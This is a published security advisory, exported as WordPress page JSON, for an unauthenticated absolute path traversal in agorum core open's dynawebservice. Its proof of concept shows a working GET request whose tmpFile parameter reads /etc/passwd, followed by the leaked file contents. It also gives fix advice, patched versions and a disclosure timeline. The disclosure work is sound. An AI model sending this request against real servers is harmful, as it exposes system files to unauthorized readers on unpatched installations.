{"id":24230,"date":"2025-06-27T16:07:15","date_gmt":"2025-06-27T14:07:15","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0022\/"},"modified":"2025-07-01T10:19:14","modified_gmt":"2025-07-01T08:19:14","slug":"usd-2025-0022","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0022\/","title":{"rendered":"usd-2025-0022"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n<h1>usd-2025-0022 | Agorum core open 11.9.1.3-1857 - Absolute Path Traversal<\/h1>\n<h1><\/h1>\n<p><strong>Product<\/strong>: Agorum core open<br \/><strong>Affected Version<\/strong>: 11.9.1.3-1857<br \/><strong>Vulnerability Type<\/strong>: Absolute Path Traversal (CWE-36)<br \/><strong>Security Risk<\/strong>: High<br \/><strong>Vendor<\/strong>: Agorum<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.agorum.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.agorum.com\/<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: Fixed<br \/><strong>CVE Number<\/strong>: Requested<br \/><strong>CVE Link<\/strong>: Requested<br \/><strong>Advisory ID<\/strong>: usd-2025-0022<\/p>\n<h3>Description<\/h3>\n<p><!-- add a description of the application and vulnerability -->agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration<\/p>\n<h3>Proof of Concept<\/h3>\n<p><!-- describe how the vulnerability can be exploited, feel free to add supporting images etc. -->The <strong>dynawebservice<\/strong> of agorum core permits an attacker to access arbitrary files on the system without requiring authentication. The following request can be used to read the <strong>\/etc\/passwd<\/strong> file:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">GET<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/dynawebservices\/wsfiling\/?action=getTemp&amp;tmpFile=\/etc\/passwd<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">localhost<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Ch-Ua<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">\"Chromium\";v=\"135\", \"Not-A.Brand\";v=\"8\"<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Ch-Ua-Mobile<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">?0<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Ch-Ua-Platform<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">\"Linux\"<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Accept-Language<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">en-US,en;q=0.9<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Upgrade-Insecure-Requests<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">1<br \/><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<\/span><\/pre>\n<\/div>\n<p>The servers response will include the full content of the requested file, as can be seen in the following output:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Powered-By<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">agorum core<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">3510<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Date<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mon, 28 Apr 2025 06:40:05 GMT<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Apache-Coyote\/1.1<br \/><br \/><\/span>root:x:0:0:root:\/root:\/usr\/bin\/zsh<br \/>daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin<br \/>bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin<br \/>sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin<br \/>sync:x:4:65534:sync:\/bin:\/bin\/sync<br \/>games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin<br \/>man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin<br \/>lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin<br \/>[...]<\/pre>\n<\/div>\n<h3>Fix<\/h3>\n<p><!-- how the vendor can fix the vulnerability.--><br \/><!-- if you recommended a quick workaround to the customer (and they are fine with you including it here!) feel free to add this information as well -->It is recommended to ensure that user input is properly validated and sanitized to prevent the use of absolute paths or dangerous characters. Always use relative paths for file access to prevent users from navigating outside the intended directories. Implement a whitelist to restrict file access to specific, trusted locations and limit file system permissions to necessary files and directories.<\/p>\n<p>&nbsp;<\/p>\n<p>Users of agorum core open should upgrade to versions 11.9.2 or 11.10.1.<\/p>\n<h3>References<\/h3>\n<p><!-- add references to the application and vulnerability.--><\/p>\n<ul>\n<li><a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\" target=\"_blank\" rel=\"noopener\">https:\/\/cwe.mitre.org\/data\/definitions\/36.html<\/a><\/li>\n<\/ul>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2025-05-05<\/strong>: First contact request via email.<\/li>\n<li><strong>2025-05-05<\/strong>: The vendor confirmed receiving our report and began investigating the finding.<\/li>\n<li><strong>2025-05-07<\/strong>: The vendor informed us that a fix is in the works.<\/li>\n<li><strong>2025-05-15<\/strong>: The vendor has addressed and fixed the vulnerability within the cloud instances.<\/li>\n<li><strong>2025-05-30<\/strong>: The vendor released fixed versions 11.9.2 and 11.10.1.<\/li>\n<li><strong>2025-06-27<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><!-- add the names of the persons that discovered the vulnerability. This information will be sent to the vendor and published on the HeroLab blog -->This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2025-0022 | Agorum core open 11.9.1.3-1857 - Absolute Path Traversal Product: Agorum core openAffected Version: 11.9.1.3-1857Vulnerability Type: Absolute Path Traversal (CWE-36)Security Risk: HighVendor: AgorumVendor URL: https:\/\/www.agorum.com\/Vendor acknowledged vulnerability: YesVendor Status: FixedCVE Number: RequestedCVE Link: RequestedAdvisory ID: usd-2025-0022 Description agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. [&hellip;]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-24230","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24230","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=24230"}],"version-history":[{"count":3,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24230\/revisions"}],"predecessor-version":[{"id":24233,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24230\/revisions\/24233"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=24230"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}